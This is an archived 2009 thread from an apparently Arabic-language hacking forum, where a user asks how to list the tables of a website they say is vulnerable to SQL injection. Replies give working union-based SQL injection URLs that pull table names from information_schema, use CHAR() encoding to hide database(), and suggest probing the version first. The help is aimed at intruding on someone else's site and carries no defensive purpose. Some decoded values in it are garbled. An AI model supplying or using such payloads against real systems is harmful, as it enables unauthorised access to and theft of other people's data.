:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   SQL INJECTION HELP (http://www.vbspiders.com/vb/t20461.html)

romeo_is_me 09-20-2009 04:12 AM

SQL INJECTION HELP
 
Hello all my friends


Plz i wanna ask :

i have a sql injectable site : i know the database name .. is there a way to know the tables name? thnx

PASSEWORD 09-20-2009 04:52 AM

what is the version of the database 4 or 5

KaLa$nikoV 09-24-2009 01:04 AM

insert
اقتباس:

version()
in the error column

look if the number error is 5
we will insert version() lick this e.g

e.g
كود PHP:

1,2,3,4,version(),6,7,8,9,10,11,12,13 


sorry iam couldnt good in En

megainfo 09-29-2009 04:24 PM

http://www.site.com/index.php?id=1+u...chema=CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41)--



CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41)= databas()

megainfo 09-29-2009 04:27 PM

كود PHP:

http://www.site.com/index.php?id=1+union+all+select+0,1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=CHAR(100, 97, 116, 97, 98, 97, 115, 101, 40, 41)-- 




كود PHP:

CHAR(100971169798971151014041) = database() 



الساعة الآن 07:15 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0